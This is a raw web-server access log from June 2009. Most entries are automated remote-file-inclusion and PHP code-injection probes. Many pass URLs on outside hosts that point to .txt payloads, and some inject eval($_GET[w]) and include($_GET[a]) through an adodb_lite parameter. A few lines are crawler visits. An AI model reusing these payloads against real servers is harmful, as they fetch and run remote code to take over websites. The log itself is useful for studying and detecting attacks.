89.223.3.98 - - [27/Jun/2009:05:34:07 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:05:34:07 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:05:34:36 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:05:34:36 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:05:34:36 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:05:35:22 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:05:35:36 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:05:36:08 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:05:36:08 -0500] "GET /logs/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:05:36:08 -0500] "GET /errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:05:36:13 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:05:39:32 -0500] "GET /logs//admin/classes/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:05:39:32 -0500] "GET //admin/classes/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.826"
213.63.185.58 - - [27/Jun/2009:05:39:54 -0500] "GET /add.php?INCLUDE_FOLDER=http://kpbclub.ru//components/com_virtuemart/id.txt??? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
213.63.185.58 - - [27/Jun/2009:05:39:54 -0500] "GET /logs/add.php?INCLUDE_FOLDER=http://kpbclub.ru//components/com_virtuemart/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
84.201.208.50 - - [27/Jun/2009:05:45:59 -0500] "GET /errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:05:45:59 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:05:45:59 -0500] "GET /logs/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:05:46:09 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:05:48:49 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:05:48:49 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:05:48:49 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:05:48:56 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:05:48:56 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:05:48:56 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:15 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:15 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:15 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:15 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:15 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:15 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:16 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:16 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:16 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:29 -0500] "GET /logs/access_log.1230854400/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:30 -0500] "GET /logs/access_log.1230854400/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:30 -0500] "GET /logs/access_log.1230768000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:33 -0500] "GET /logs/access_log.1230854400/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:33 -0500] "GET /logs/access_log.1230768000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:49:36 -0500] "GET /logs/access_log.1230768000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:05:50:47 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 281 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:05:50:53 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 286 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:05:50:53 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 308 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:05:50:54 -0500] "GET /logs/access_log.1232409600/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:05:50:55 -0500] "GET /logs/access_log.1230508800/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:50:59 -0500] "GET /logs/access_log.1228608000%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:51:03 -0500] "GET /logs/access_log.1228608000%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:05:51:05 -0500] "GET /logs/access_log.1230854400/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 308 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:05:51:08 -0500] "GET /logs/access_log.1230508800/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 308 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:05:51:09 -0500] "GET /logs/access_log.1230508800/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:05:51:09 -0500] "GET /logs/access_log.1232409600/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:51:19 -0500] "GET /logs/access_log.1228608000%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.55.208.122 - - [27/Jun/2009:05:52:14 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [27/Jun/2009:05:52:14 -0500] "GET /logs/access_log.1201478400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
173.1.96.154 - - [27/Jun/2009:05:55:47 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
173.1.96.154 - - [27/Jun/2009:05:55:47 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
173.1.96.154 - - [27/Jun/2009:05:55:47 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
173.1.96.154 - - [27/Jun/2009:05:55:47 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
173.1.96.154 - - [27/Jun/2009:05:55:47 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
173.1.96.154 - - [27/Jun/2009:05:55:47 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
83.98.209.71 - - [27/Jun/2009:05:57:21 -0500] "GET /logs/access_log.1230508800/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:57:21 -0500] "GET /logs/access_log.1232409600/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:57:22 -0500] "GET /logs/access_log.1230508800/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:57:22 -0500] "GET /logs/access_log.1232409600/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:57:30 -0500] "GET /logs/access_log.1230508800/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:05:57:30 -0500] "GET /logs/access_log.1232409600/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:06:02:25 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:06:02:25 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:06:02:25 -0500] "GET /logs/access_log.1237507200//skins/advanced/advanced1.php?pluginpath[0]=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:06:02:37 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:06:02:37 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:06:02:37 -0500] "GET /logs/access_log.1237507200//skins/advanced/advanced1.php?pluginpath[0]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:06:02:37 -0500] "GET /logs/access_log.1236988800//skins/advanced/advanced1.php?pluginpath[0]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:02:44 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:02:44 -0500] "GET /logs/access_log.1236038400/convert/mvcw.php?step=1&vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:02:44 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:02:48 -0500] "GET /logs/access_log.1239321600/convert/mvcw.php?step=1&vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:06:02:50 -0500] "GET /logs/access_log.1228608000%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 310 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:06:03:24 -0500] "GET /logs/access_log.1237680000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:06:03:24 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:06:03:24 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:06:03:33 -0500] "GET /logs/access_log.1236297600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [27/Jun/2009:06:03:51 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
62.140.23.192 - - [27/Jun/2009:06:03:51 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
86.39.131.85 - - [27/Jun/2009:06:04:00 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:04:00 -0500] "GET /logs/access_log.1236038400/convert/mvcw.php?vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:04:00 -0500] "GET /logs/access_log.1239321600/convert/mvcw.php?vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:04:00 -0500] "GET /convert/mvcw.php?vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:06:05:28 -0500] "GET //adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:06:05:35 -0500] "GET /logs/access_log.1238457600//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:06:05:35 -0500] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:06:05:35 -0500] "GET /logs/access_log.1240012800//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.230.168 - - [27/Jun/2009:06:06:21 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.168 - - [27/Jun/2009:06:06:22 -0500] "GET /logs/access_log.1234051200 HTTP/1.1" 200 112812 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
216.75.60.116 - - [27/Jun/2009:06:06:27 -0500] "GET /logs/access_log.1240704000//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:06:06:54 -0500] "GET /logs/access_log.1241913600//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
220.181.7.97 - - [27/Jun/2009:06:07:02 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
86.39.131.85 - - [27/Jun/2009:06:07:10 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:07:10 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:07:11 -0500] "GET /logs/access_log.1236038400/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:07:11 -0500] "GET /logs/access_log.1234137600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
91.197.128.4 - - [27/Jun/2009:06:07:13 -0500] "GET //include/write.php?dir=http://izzynet.110mb.com/tcl/fx29id2.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
91.197.128.4 - - [27/Jun/2009:06:07:13 -0500] "GET /logs//include/write.php?dir=http://izzynet.110mb.com/tcl/fx29id2.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
91.197.128.4 - - [27/Jun/2009:06:07:13 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://izzynet.110mb.com/tcl/fx29id2.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.63.185.58 - - [27/Jun/2009:06:07:23 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://kpbclub.ru//components/com_virtuemart/id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
216.75.60.116 - - [27/Jun/2009:06:07:48 -0500] "GET /logs/access_log.1240012800//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:06:07:48 -0500] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:06:07:48 -0500] "GET //adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.63.185.58 - - [27/Jun/2009:06:07:55 -0500] "GET /?INCLUDE_FOLDER=http://kpbclub.ru//components/com_virtuemart/id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
213.63.185.58 - - [27/Jun/2009:06:08:25 -0500] "GET /logs/?INCLUDE_FOLDER=http://kpbclub.ru//components/com_virtuemart/id.txt??? HTTP/1.1" 200 85865 "-""libwww-perl/5.805"
216.75.60.116 - - [27/Jun/2009:06:08:47 -0500] "GET /logs/access_log.1240704000//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
212.112.168.146 - - [27/Jun/2009:06:10:27 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam5.t35.com/idv6.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
212.112.168.146 - - [27/Jun/2009:06:10:27 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam5.t35.com/idv6.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
212.112.168.146 - - [27/Jun/2009:06:10:27 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam5.t35.com/idv6.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
212.112.168.146 - - [27/Jun/2009:06:10:33 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam5.t35.com/idv6.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
